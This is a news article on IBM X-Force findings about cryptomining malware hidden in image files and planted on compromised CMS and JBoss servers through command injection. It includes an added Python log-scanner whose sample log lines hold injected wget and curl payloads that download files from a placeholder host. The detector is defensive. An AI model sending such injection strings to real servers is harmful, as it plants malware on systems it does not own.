Don't turn your infrastructure into a goldmine for others

There has been a steep increase in the number of cryptocurrency mining tools used in cyber-attacks, according to a new research report by IBM's X-Force.

According to the research, malware containing cryptocurrency mining tools has started to centre on enterprise networks and CPU mining. The tools were hidden within fake image files (a technique known as steganography) hosted on compromised web servers running Joomla or WordPress, or stored on compromised JBoss Application Servers.

Researchers said that hackers attempted to mine CryptoNote-based currencies such as Monero (XMR), which employs the CryptoNight mining algorithm.

“Command injection (CMDi) attacks, detected by IBM Security's managed intrusion detection and prevention system (IDPS) service during the attacks, were trying to plant the malicious images on victims' machines using WGET and CURL shell commands when victims simply visited the page via a link in an email or through visiting a compromised site,” said researchers.

There are two possible ways the attacks can be launched, noted researchers. First, the attackers scanned for already compromised CMS installations and then conducted the CMDi attack. Second, cyber-criminals performed both the initial compromise of the web resource and the subsequent CMDi attack.
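As an added illustration of the detection side of what the researchers describe (example code, not from the IBM report), the following Python scans web-server access-log lines for requests that chain wget or curl after a shell separator, decoding percent-encoded payloads first. The log lines, hostnames and function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined format (not from the report).
# Lines 1-3 carry CMDi-style download attempts (the third is percent-encoded
# with a backtick subshell); the last two are benign and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2018:10:01:12 +0000] "GET /index.php?option=com_foo&id=1;wget%20http://example.invalid/i.jpg%20-O%20/tmp/i.jpg HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2018:10:01:13 +0000] "GET /wp-admin/admin-ajax.php?action=x%7Ccurl%20-s%20http://example.invalid/i.png%20%3E%20/tmp/.x HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2018:10:02:40 +0000] "POST /jmx-console/HtmlAdaptor?cmd=%60wget+http%3A%2F%2Fexample.invalid%2Fa.jpg%60 HTTP/1.1" 200 77
192.0.2.7 - - [10/Jan/2018:10:03:01 +0000] "GET /images/logo.jpg HTTP/1.1" 200 8931
192.0.2.8 - - [10/Jan/2018:10:03:05 +0000] "GET /blog/?s=curl+tutorial HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*? "(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')
# A shell separator (; | & backtick or $( ) immediately followed by a downloader.
# A bare word "curl" inside a search query has no separator and does not match.
CMDI_DOWNLOAD_RE = re.compile(r'(?:[;|&`]|\$\()\s*(?P<tool>wget|curl)\b', re.IGNORECASE)


def decode_target(target, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are unwrapped."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_cmdi_download_attempts(log_text):
    """Return one hit per request whose target chains wget/curl after a shell
    separator, the pattern the IDPS service saw when miner images were planted."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        decoded = decode_target(m.group('target'))
        hit = CMDI_DOWNLOAD_RE.search(decoded)
        if hit:
            hits.append({'ip': m.group('ip'), 'method': m.group('method'),
                         'tool': hit.group('tool').lower(), 'target': decoded})
    return hits


if __name__ == '__main__':
    for h in find_cmdi_download_attempts(SAMPLE_LOG):
        print(f"{h['ip']} {h['method']} via {h['tool']}: {h['target']}")
```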

Figures released by IBM showed that manufacturing and financial services were the most targeted, followed by arts and entertainment, information and communication technology, and retail.

“The reason why certain industries were targeted over others is not easily explained. Although we have not identified any specific tools being used to scan for weaknesses in these platforms, we understand that it is a prerequisite in the exploitation of this attack type. Attackers are likely targeting industries with the most vulnerable targets versus those that offer some type of advantage in terms of mining virtual currency,” said the researchers.

The report added that the latest miners go after CPUs as attackers can't count on everyone running GPUs. 

“They realise there is a large number of potential targets that are not utilising GPUs. Most mainstream computers use integrated graphics processors (IGP), which consume less power and are much cheaper. However, they are much slower than GPUs. IGPs are built into the computer motherboard, whereas GPUs are optional add-on hardware that have much higher power requirements,” said researchers.

Researchers also noted that the CryptoNight mining algorithm employed by CryptoNote-based currencies is designed for mining on CPUs and can be efficiently run on billions of existing devices (any modern x86 CPU). However, a newer mining tool called Claymore's Cryptonight GPU Miner was developed to leverage both GPUs and CPUs.

Researchers said that to shut down the virtual mint trying to take root on the infrastructure organisations protect, applying standard security precautions is the top priority.

“Creating a one-stop shopping solution for preventing miners from being executed in your environment is almost impossible because so many variables exist. Focus on your network specifics and take every precaution to identify and lock down the applicable entry points of malware and miners alike,” they said.

Josh Mayfield, platform specialist, Immediate Insight at FireMon, told SC Media UK that in order to prevent these kinds of attacks, organisations should start with a good understanding of the critical components of the assets under management. 

“Often, this comes in the form of a Configuration Management Database (CMDB), which serves as a directory for all the IT assets within the organisation,” he said.

“Just as directories like Active Directory and LDAP have essential details about users, a CMDB is our single-source-of-truth for IT assets. Signifying where GPUs reside with the assets is the first step to understanding your vulnerabilities.”

Pascal Geenens, Radware EMEA security evangelist, told SC Media UK that what worries him most is the emerging use of crypto-mining through browsers.

“A hacker poisoning CDNs to distribute crypto-mining capabilities for browsers can steal CPU cycles of many users without them even noticing. Not immediately a security breach or direct risk, but I don't feel comfortable with the idea and I do not have much to detect or protect me from it,” he said.